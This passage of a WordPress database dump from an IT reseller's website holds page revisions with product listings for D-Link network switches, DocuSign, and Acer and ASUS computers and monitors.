srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 14:57:37','2018-12-20 06:57:37','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2786,1,'2019-01-04 09:33:22','2019-01-04 01:33:22','','product_shot_1_2','','inherit','closed','closed','','product_shot_1_2','','','2019-01-04 09:33:22','2019-01-04 01:33:22','',1481,'https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png',0,'attachment','image/png',0),(2787,1,'2019-01-04 09:34:23','2019-01-04 01:34:23','','product_shot_2_2','','inherit','closed','closed','','product_shot_2_2','','','2019-01-04 09:34:23','2019-01-04 01:34:23','',1481,'https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png',0,'attachment','image/png',0),(2788,1,'2019-01-04 09:36:53','2019-01-04 01:36:53','<h2>Get to \"yes\" faster with DocuSign electronic signatures</h2>https://youtu.be/sKoNwKcGKF0		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h3>Sign. Send. Success.</h3><p>Use DocuSign to complete approvals and agreements in minutes or hoursâ€”not daysâ€”from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.</p><h3>Modernize your System of Agreement</h3><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSignâ€™s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignatureÂ® but also the many options of a System of Agreement Platform.</p>		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h2>DocuSign</h2><h3>Grow your business.<br />Shrink your paperwork.</h3><h3>Delight customers with an easier way to do business</h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collectionâ€”on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.</p><h3><img src=\"https://www.docusign.com/sites/default/files/keybenefits-1.png\" alt=\"DocuSign signing experience in mobile device\" width=\"438\" height=\"212\" data-delta=\"1\" /></h3><h3>Simple to implement, easy to useâ€”customers and employees will be up and running in minutes</h3><p>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature,Â collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.</p><h3><img src=\"https://www.docusign.com/sites/default/files/smb-keybenefits-2-2_07.png\" alt=\"\" width=\"392\" height=\"184\" data-delta=\"1\" /></h3><h3>Works with the applications, services and devices your business already uses</h3><p>DocuSign fits right into your existing systems so youâ€™ll be productive, instantly.Â Use DocuSign with over 300 popular servicesÂ like Google, Salesforce and Box, orÂ access our award-winning appÂ from practically any mobile device. Works with virtually any kind of document.</p><h3><img src=\"https://www.docusign.com/sites/default/files/SMB.png\" alt=\"\" width=\"460\" height=\"144\" data-delta=\"3\" /></h3><h3>The reliable, globally-trusted service for electronic signatures</h3><p>Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.</p><h2>Â </h2><h3>Do more with the #1 eSignature platform for business</h3><ul><li>Simple and fast setup gets you started immediately</li><li>99.99% platform availability keeps your business running at all hours</li><li>Flexible workflows to automate any agreement or approval process</li><li>Rigorous security standards keep sensitive documents safe</li><li>Instant visibility into document status and powerful reporting</li><li>Full digital audit trail for easy compliance and legal enforceability</li></ul><p>[maxbutton id=\"1\" ]</p>Â Â ','DocuSign','','inherit','closed','closed','','1481-revision-v1','','','2019-01-04 09:36:53','2019-01-04 01:36:53','',1481,'https://bintara.com.my/blog/2019/01/04/1481-revision-v1/',0,'revision','',0),(2666,1,'2018-12-20 15:11:56','2018-12-20 07:11:56','<h3>Business Product Solution</h3>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2018-12-20 15:11:56','2018-12-20 07:11:56','',1430,'https://bintara.com.my/blog/2018/12/20/1430-revision-v1/',0,'revision','',0),(2662,1,'2018-12-20 15:08:03','2018-12-20 07:08:03','[vfb id=4]','Get Quotation (Acer)','','publish','closed','closed','','get-quotation-acer','','','2018-12-20 15:08:14','2018-12-20 07:08:14','',0,'https://bintara.com.my/?page_id=2662',0,'page','',0),(2663,1,'2018-12-20 15:08:00','2018-12-20 07:08:00','[vfb id=4]','Get Quotation (Acer)','','inherit','closed','closed','','2662-revision-v1','','','2018-12-20 15:08:00','2018-12-20 07:08:00','',2662,'https://bintara.com.my/blog/2018/12/20/2662-revision-v1/',0,'revision','',0),(2741,1,'2018-12-24 10:45:14','2018-12-24 02:45:14','[vfb id=9]','Get Quotation (Canon)','','inherit','closed','closed','','2737-autosave-v1','','','2018-12-24 10:45:14','2018-12-24 02:45:14','',2737,'https://bintara.com.my/blog/2018/12/24/2737-autosave-v1/',0,'revision','',0),(2672,1,'2018-12-20 17:03:27','2018-12-20 09:03:27','[vfb id=6]','Get Quotation (Asus)','','inherit','closed','closed','','2671-revision-v1','','','2018-12-20 17:03:27','2018-12-20 09:03:27','',2671,'https://bintara.com.my/blog/2018/12/20/2671-revision-v1/',0,'revision','',0),(2668,1,'2018-12-20 15:55:17','2018-12-20 07:55:17','<h3>NOTEBOOK</h3>\r\n<table style=\"height: 217px;\" width=\"1104\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2553 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-13-UX331UN.jpg\" alt=\"\" width=\"173\" height=\"173\" />\r\n<p style=\"text-align: center;\"><strong>ASUS ZenBook 13 UX331UN</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2555 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg\" alt=\"\" width=\"192\" height=\"192\" /><strong style=\"font-family: inherit; font-size: inherit;\">ASUS ZenBook Flip S UX370UA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2556\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Transformer-Book-T101HA.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Transformer Book T101HA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>MONITOR</h3>\r\n<table style=\"height: 781px;\" width=\"578\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2558 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP278H.jpg\" alt=\"\" width=\"189\" height=\"189\" /></p>\r\n<p style=\"text-align: center;\"><strong>VP278H</strong></p>\r\n\r\n<ul>\r\n 	<li>27â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>Extensive connectivity including , dual HDMI and D-sub ports. Plus 2-Watt stereo speakers.</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2565 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VZ249H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VZ249H</strong></p>\r\n\r\n<ul>\r\n 	<li>Stylish ultra-slim profile is only 7mm thin</li>\r\n 	<li>Frameless design suitable for multi-display use</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n</ul>\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2562 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VA326H.jpg\" alt=\"\" width=\"193\" height=\"193\" />\r\n<p style=\"text-align: center;\"><strong>VA326H</strong></p>\r\n\r\n<ul>\r\n 	<li>31.5â€ FHD display with 178Â° wide viewing angle and a 1800R panel curvature makes movies and games more immersive</li>\r\n 	<li>144Hz rapid refresh rate for incredibly-smooth and fast gaming visual</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2563 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VC239H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VC239H</strong></p>\r\n\r\n<ul>\r\n 	<li>In-Plane Switching technology panel with LED backlight in frameless &amp; Slim design</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n 	<li>Embedded wall mount hole for multiple using scenario</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"wp-image-2561 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA329Q.jpg\" alt=\"\" width=\"169\" height=\"169\" />\r\n<p style=\"text-align: center;\"><strong>PA329Q</strong></p>\r\n\r\n<ul>\r\n 	<li>32-inch, 4K UHD 3840 x 2160 resolution display with IPS technology for immersive visuals</li>\r\n 	<li>100% Rec.709 and 99.5% Adobe RGB true color reproduction, factory pre-calibrate for outstanding color accuracy (âˆ†E &lt;2). Support DIC-P3 and Rec. 2020 color standard.</li>\r\n 	<li>Incorporate with ASUS ProArtâ„¢Calibration technology for profession with a 14-bit look-up table (LUT), uniformity compensation capability and saves all color parameters profile on the monitor with no color distortion</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2564 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP228HE.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n<p style=\"text-align: center;\"><strong>VP228HE</strong></p>\r\n\r\n<ul>\r\n 	<li>21.5â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>The TÃœV Rheinland-certified ASUS Flicker-Free and Low Blue Light technologies</li>\r\n 	<li>Robust connectivity including HDMI and D-sub ports. Plus 1.5-Watt stereo speakers</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2566\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MB169B-1.jpg\" alt=\"\" width=\"284\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>MB169B+</strong></p>\r\n\r\n<ul>\r\n 	<li>15.6-inch Full HD portable USB-powered monitor with a single USB 3.0 cable for power and data transmission</li>\r\n 	<li>Worldâ€™s slimmest and lightest USB monitor with a sleek and metallic finish</li>\r\n 	<li>Auto-rotating display bundled with the ASUS Smart Case â€“ a two-way adjustable stand and protective sleeve</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>DESKTOP</h3>\r\n<table style=\"height: 887px;\" width=\"645\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2567 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUSPRO-E520.jpg\" alt=\"\" width=\"167\" height=\"167\" />\r\n<p style=\"text-align: center;\"><strong>ASUSPRO E520</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Home or other editions available</li>\r\n 	<li>ASUS Control Center server-grade IT management software and 36-month stable supply guarantee through ASUS Corporate Stable Model program</li>\r\n 	<li>7th Gen IntelÂ® Coreâ„¢ processors and 2400MHz DDR4 memory for enhanced productivity</li>\r\n 	<li>Ultra-detailed 4K UHD visuals and dual display support</li>\r\n 	<li>Slim and compact 1-liter design with detachable extension bay for optional optical drive, and serial and parallel ports</li>\r\n 	<li>Quiet and energy-efficient operation with Energy Star certification</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2568 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Chromebox-3.jpg\" alt=\"\" width=\"173\" height=\"173\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Chromebox 3</strong></p>\r\n\r\n<ul>\r\n 	<li>All-new Chromebox, powered by the latest 8th Generation IntelÂ® Coreâ„¢ processor</li>\r\n 	<li>Run thousands of Android app on Google Play with incredible performance</li>\r\n 	<li>Versatile USB 3.1 Gen 1 Type-C port for data transfer, power delivery and DisplayPort functionality</li>\r\n 	<li>Stay safe from viruses and malware with automatic system updates</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free work area.</li>\r\n 	<li>Easy setup and automatic software and security updates for protection from viruses and malware</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"wp-image-2577 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB60.jpg\" alt=\"\" width=\"216\" height=\"83\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Mini PC PB60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Powered by the latest IntelÂ® PentiumÂ® Gold or Coreâ„¢ T Series Processors for desktop-grade performance</li>\r\n 	<li>Dual-storage design with one M.2 PCIe 3.0 x4 SSD and one 2.5-inch HDD for high storage capacity.</li>\r\n 	<li>Compact, one-liter size metal chassis for a clutter-free workspace, plus vertical stand and VESA mount compatibility</li>\r\n 	<li>ASUS Corporate Stable Model program â€” 36-month stable-supply guarantee.</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2572 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MINI-PC-PN60.jpg\" alt=\"\" width=\"186\" height=\"186\" /></p>\r\n<p style=\"text-align: center;\"><strong>MINI PC PN60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro.</li>\r\n 	<li>Ultracompact size with 0.62-liter volume for a clutter-free workspace</li>\r\n 	<li>Powerful performance with the latest IntelÂ® Coreâ„¢ processors</li>\r\n 	<li>Sliding chassis design for easy, two-step storage and memory upgrades</li>\r\n 	<li>Comprehensive I/O connectivity 